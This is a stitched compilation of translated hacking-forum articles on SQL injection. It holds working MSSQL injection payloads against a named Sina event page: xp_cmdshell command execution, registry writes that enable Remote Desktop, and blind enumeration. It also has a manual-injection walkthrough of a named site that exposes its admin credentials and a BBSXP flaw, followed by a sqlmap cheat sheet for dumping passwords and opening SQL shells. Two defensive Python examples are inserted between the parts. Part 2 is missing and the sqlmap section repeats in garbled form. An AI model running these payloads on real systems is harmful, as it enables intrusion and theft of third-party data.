hdsi2.0 SQL injection: analysis of captured statements (script security)

Author: wanglinqu123

This compilation of 5 pieces on hdsi2.0 SQL injection and the statements captured from it was contributed by wanglinqu123.


Part 1: hdsi2.0 SQL injection: analysis of captured statements (script security)

Restore cmd (xp_cmdshell):

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

Execute commands:

sql: ;ipconfig -all--

dos:

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "ipconfig -all"--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

List directories:

c:  jiaozhu  (temporary table)

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu EXEC MASTER..XP_dirtree "c:",1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

Upload file:

Local path: C:\Inetpub\wwwroot\cook.txt   Save location: c:

Database stored procedure:

;exec master..xp_cmdshell ' echo cdb_sid=3UrzOV;%20cdb_cookietime=259;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%20cdb_visitedfid=12;%20cdb_oldtopics=D8D>c:\'--

Database backup: (delete the temporary table after uploading)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name,@s='c:/' backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

Enable 3389:

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control\terminal servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard layout\toggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

Injection analysis: numeric type; SQL error messages: off; enabled: access

Keyword used: 宝石公园“你玩 我抽”中奖名单公布

igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

Stacked queries: supported

Subqueries: supported

Privileges: public

Current user: dbo

Current database: event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

...

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

...

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

Cross-database:

Guessing database names:

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7

...

...

...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104

and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <104

...

...

...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master: not sa privileges, so cross-database access is not possible

Guessing table names:

EventCategory

GET

and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85)) T order by id desc) < 80

Guessing column names:

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62

and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory' order by A.name desc) T order by name asc )<35
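Detection logic for the captures above, as an added example that is not part of the original article: it parses constructed IIS W3C log lines, flags the probe signatures seen in the HDSI traffic (tautologies, len()/ascii(substring()) bisection, catalogue lookups, role probes, xp_ extended procedures), and then groups requests that differ only in the compared constant to surface the character-by-character guessing loop. The log format, client addresses and burst threshold are assumptions.

```python
"""Flag boolean-blind SQL injection enumeration in IIS W3C logs.

Added example, not part of the original article. The captured requests share a
few signatures: tautology checks (and 1=1 / and 1=2), length and character
bisection (len(user)<N, ascii(substring(user,i,1))<N), catalogue lookups
(sysobjects, sysdatabases, syscolumns), role probes and stacked calls to xp_
extended procedures. One matching request is suspicious; a run of requests
from one client that differ only in the compared constant is the bisection
loop itself. Log format, addresses and threshold below are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2009-05-01 10:00:01 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57 200
2009-05-01 10:00:02 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20And%201=1 200
2009-05-01 10:00:02 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20And%201=2 500
2009-05-01 10:00:03 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20and%20(select%20len(user))%3C32 200
2009-05-01 10:00:03 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20and%20(select%20len(user))%3C16 200
2009-05-01 10:00:04 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20and%20(select%20len(user))%3C4 200
2009-05-01 10:00:04 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20and%20(select%20ascii(substring(user,1,1)))%3C80 500
2009-05-01 10:00:05 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57%20and%20(select%20ascii(substring(user,1,1)))%3C104 200
2009-05-01 10:00:09 203.0.113.7 GET /plaza/event/new/crnt_event_view.asp event_id=57;exec%20master..xp_cmdshell%20'ipconfig'-- 200
2009-05-01 10:01:00 198.51.100.9 GET /plaza/event/new/crnt_event_view.asp event_id=58 200
2009-05-01 10:01:05 198.51.100.9 GET /search.asp q=select+a+user 200
"""

# Each signature corresponds to one family of probes in the captures above.
SIGNATURES = {
    "tautology":   re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "len_bisect":  re.compile(r"\blen\s*\(", re.I),
    "char_bisect": re.compile(r"\b(?:ascii|unicode)\s*\(\s*substring\s*\(", re.I),
    "catalogue":   re.compile(r"\bsys(?:objects|columns|databases)\b", re.I),
    "role_probe":  re.compile(r"\bis_(?:srvrolemember|member)\s*\(", re.I),
    "xp_proc":     re.compile(r"\bxp_(?:cmdshell|dirtree|regwrite)\b", re.I),
}

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
COMPARED_CONST = re.compile(r"([<>=]\s*)\d+")


def parse_line(line):
    """Split one W3C line into a dict with the query URL-decoded; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, stem, query, status = m.groups()
    return {"ts": ts, "ip": ip, "method": method, "stem": stem,
            "query": unquote_plus(query), "status": int(status)}


def classify(query):
    """Names of the signatures a decoded query string matches (sorted, maybe empty)."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def normalise(query):
    """Replace every constant after a comparison operator so bisection steps collapse."""
    return COMPARED_CONST.sub(r"\1N", query)


def analyse(log_text, burst_threshold=3):
    """Return (hits, loops): flagged requests and (ip, stem, pattern) -> count bursts."""
    hits = []
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            hits.append((rec["ts"], rec["ip"], rec["stem"], tags))
            counts[(rec["ip"], rec["stem"], normalise(rec["query"]))] += 1
    loops = {key: n for key, n in counts.items() if n >= burst_threshold}
    return hits, loops


if __name__ == "__main__":
    found, bursts = analyse(SAMPLE_LOG)
    for ts, ip, stem, tags in found:
        print(f"{ts} {ip} {stem} {','.join(tags)}")
    for (ip, stem, pattern), n in bursts.items():
        print(f"bisection loop: {ip} {stem} {pattern!r} x{n}")
```

Only the first client is flagged; the second client's plain requests, including a literal "select a user" search term, produce no hit, which is the false-positive check worth keeping when tuning the signatures.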


Part 3: Manual injection (script security)

Injection tools are everywhere now, and the level of automation... could not be any more automatic.

Many people can skilfully use automatic injection tools like 啊D and 明小子 and think that means they know how...

But the principle behind injection? What injection is, why it arises, the process... and so on.

Do you know? Have you ever tried real manual injection? Probably not.

So now I will use the manual injection tool I wrote to walk through the overall manual injection process.

First find a site with an injection vulnerability. Easy, they are all over the place.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username  admin

password  bfpms

id  35

Found one. This is a standard "begging to be hacked" site; no need to talk about its security.

www.jinhu168.com/A3/NewsInfo.asp?id=75

The address with the injection vulnerability. Let's check it.

Fairly certain it is probably vulnerable. Continue.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

Check whether the table name manage_User exists.

Sorry, this tool keeps throwing errors... the recording tool is not very good. If you know a good one, recommend it when you have time....

OK, continue.

manage_User exists... the page returns normally...

I changed the name; if it does not exist, an error page comes back.

This box is for you to fill in a prompt statement; if you do not need it, just clear it.

Continue.

Returns normally, meaning it exists. Continue. Hold on, taking a phone call.

Sorry.

Not 1 character: the error page comes back. Heh, 5 characters: the normal page comes back.

So now we know a lot about it: the table, the field, and the content length.

The first character of the account is not '1', so it errors.

Heh, the first character of the account is 'a', correct... so the normal page comes back.

No need to think hard about what the account is: 5 characters, admin.

It really is.... haha.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

For everyone's study I have extracted the example statements; they are the same as what the program does, so you can look into them.

The password and the rest follow the same process. Got it? It is not very hard, it just takes patience. If it were simple, fully automatic injection tools would never have appeared.

I hope that while using my tool you also learn something.

Part 4: BBSXP, lots of injections (script security)

By:sobiny[B.C.T]

I submitted a vulnerability report to BBSXP and got no response at all from the vendor.

Actually the main problem is that they have far too many injections of one type.

I am embarrassed to post them all; posting that many makes my hand hurt.

Sigh, here is one example.

The Search.asp file

127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149

if Request("menu")="Result" then
Keywords=HTMLEncode(Request("Keywords"))
SortBy=HTMLEncode(Request("SortBy"))
Item=HTMLEncode(Request("Item"))
if Keywords="" then error("您没有输入任何查询条件!")
if Request("VerifyCode")<>Session("VerifyCode") or Session("VerifyCode")="" then error("验证码错误!")
' Item and SortBy are only HTMLEncode'd, then concatenated straight into the SQL text
SQLSearch="IsApproved=1 and IsDel=0 and "&Item&" like '%"&Keywords&"%' "
if DateComparer >0 then SQLSearch=SQLSearch&" and PostTime>"&SqlNowString&"-"&DateComparer&" "
if ForumID >0 then SQLSearch=SQLSearch&" and ForumID="&ForumID&" "
sql="select * from [BBSXP_Threads] where "&SQLSearch&" order by ThreadID "&SortBy&""
Rs.Open sql,Conn,1

……………………

I'm speechless: two injectable spots in one statement. BBSXP is really something.

They have not patched this type of vulnerability.

I really do not plan to keep looking; there are too many bugs.
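A hardened version of the Search.asp query construction, as an added example in Python (not BBSXP's code): it keeps the same WHERE logic but allow-lists Item and SortBy, which cannot be bound as parameters, and binds Keywords, DateComparer and ForumID as parameters, then runs against an in-memory SQLite table of constructed rows. The searchable column set, the julianday() date arithmetic and the demo rows are assumptions.

```python
"""Hardened replacement for the BBSXP Search.asp query builder.

Added example, not BBSXP's code. The original concatenates Item and SortBy into
the SQL text after HTMLEncode(), but HTMLEncode only rewrites HTML
metacharacters (< > & " '), so a value such as Desc/**/union reaches the
database untouched. Identifiers and sort direction cannot be bound as
parameters, so they are checked against an allow-list; the keyword and the
numeric filters are passed as bound parameters. Column names beyond those on
the page and the demo rows are assumptions.
"""
import html
import sqlite3

ALLOWED_ITEMS = {"ThreadID", "Subject"}   # assumed searchable columns
ALLOWED_SORT = {"Asc", "Desc"}


def html_encode(value: str) -> str:
    """Stand-in for ASP HTMLEncode: it neutralises markup, not SQL."""
    return html.escape(value, quote=True)


def build_search_sql(item, sort_by, keywords, date_comparer=0, forum_id=0):
    """Return (sql, params); raise ValueError for anything outside the allow-lists."""
    if item not in ALLOWED_ITEMS:
        raise ValueError(f"Item not allowed: {item!r}")
    if sort_by not in ALLOWED_SORT:
        raise ValueError(f"SortBy not allowed: {sort_by!r}")
    if not keywords:
        raise ValueError("no search keywords")
    # int() raises ValueError for non-numeric input such as "1 union ..."
    date_comparer, forum_id = int(date_comparer), int(forum_id)

    where = ["IsApproved=1", "IsDel=0", f"{item} LIKE ?"]
    params = [f"%{keywords}%"]
    if date_comparer > 0:
        # PostTime > SqlNowString - DateComparer from the original, in SQLite terms
        where.append("PostTime > julianday('now') - ?")
        params.append(date_comparer)
    if forum_id > 0:
        where.append("ForumID = ?")
        params.append(forum_id)
    sql = (f"SELECT ThreadID FROM BBSXP_Threads WHERE {' AND '.join(where)} "
           f"ORDER BY ThreadID {sort_by}")
    return sql, params


def is_rejected(item, sort_by, keywords="aaaaa"):
    """True when the builder refuses the request instead of emitting SQL."""
    try:
        build_search_sql(item, sort_by, keywords)
    except ValueError:
        return True
    return False


def open_demo_db():
    """In-memory table with constructed rows mirroring the columns Search.asp uses."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE BBSXP_Threads(
            ThreadID INTEGER, ForumID INTEGER, Subject TEXT,
            IsApproved INTEGER, IsDel INTEGER, PostTime REAL);
        INSERT INTO BBSXP_Threads VALUES
            (1, 1, 'hello aaaaa',   1, 0, julianday('now') - 1),
            (2, 1, 'other thread',  1, 0, julianday('now') - 10),
            (3, 2, 'aaaaa again',   1, 0, julianday('now') - 400),
            (4, 1, 'aaaaa deleted', 1, 1, julianday('now'));
    """)
    return conn


def search(conn, item, sort_by, keywords, date_comparer=0, forum_id=0):
    """Run the allow-listed, parameterised query and return matching ThreadIDs."""
    sql, params = build_search_sql(item, sort_by, keywords, date_comparer, forum_id)
    return [row[0] for row in conn.execute(sql, params)]


if __name__ == "__main__":
    db = open_demo_db()
    print("HTMLEncode leaves it unchanged:", html_encode("Desc/**/union"))
    print("rejected by allow-list:", is_rejected("ThreadID", "Desc/**/union"))
    print("normal search:", search(db, "Subject", "Desc", "aaaaa"))
```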

Part 5: sqlmap injection commands (script security)

The tool provided is sqlmap version 0.9.


Get database names:

./sqlmap.py -u "www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs

Get table names:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database --tables

Get column names:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_adminactions --columns

Get values:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_members -C username,password --dump

Update:

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell   // run SQL statements

sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5   // more detailed output

Load options from a configuration INI file:

sqlmap -c sqlmap.conf

Submit with the POST method:

sqlmap.py -u "www.myhack58.com/sqlmap/oracle/post_int.php" --method POST --data "id=1"

Submit via cookies; separate cookie values with ";". TamperData can be used to capture the cookies.

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

Referer spoofing:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --referer "www.google.com" -v 3

Use a custom user-agent, or pick one at random from the bundled user-agents.txt:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

Basic authentication:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

Digest authentication:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

Use a proxy, for example together with Tor:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:3128"

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:8118"

Multi-threaded guessing:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

Skip dynamic detection and name the injectable parameter directly; several parameters can be separated with commas; inject via the user-agent:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"

Specify the DBMS, skipping sqlmap's automatic detection:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server

Specify the operating system, skipping sqlmap's automatic detection:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux

* Windows

Custom payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy presents itself when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "Select * FROM users Where id=('" . $_GET['id'] . "') LIMIT 0, 1";:

$ python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntactically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without the need to provide a custom injection payload, but sometimes in real-world applications it is necessary to provide it.

Page comparison:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "lu[\w][\w]er" -v

Exclude dynamic site content from the comparison:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked-statement test; PHP's built-in mysql_query() does not support multiple statements:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection using the ORDER BY technique:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 -f

python sqlmap.py -u "192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is DBA:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

List database users:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --users -v 0

List database user passwords:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --passwords -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

Show user privileges:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --privileges -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of the given table in the given database:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump the given column of the given table in the given database:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Limit the dump to entries 2 through 4:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump the contents of all databases and all tables:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables (exclude system databases):

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

SQL query:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --sql-query "Select usename FROM pg_user" -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --sql-query "Select host, password FROM mysql.user LIMIT 1, 3" -v 1

Select usename, passwd FROM pg_shadow orDER BY usename

Save and resume a session:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save options to an INI configuration file:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save


Source: 影子

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 1 --sql-shell //执行SQL语句

sqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf使用POST方法提交

sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/post_int.php“ --method POST --data ”id=1“使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/cookie_int.php“ --cookie ”id=1“ -v 1使用referer欺骗

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --referer ”www.google.com“ -v 3使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --user-agent ”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)“ -v 3python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 -a ”./txt/user-agents.txt“

使用基本认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1“ --auth-type Basic --auth-cred ”testuser:testpass“ -v 3使用Digest认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1“ --auth-type Digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合TOR

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:3128“

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 1 -p ”id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --dbms “PostgreSQL”* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --os “Windows”* Linux

* Windows自定义payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

$ python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
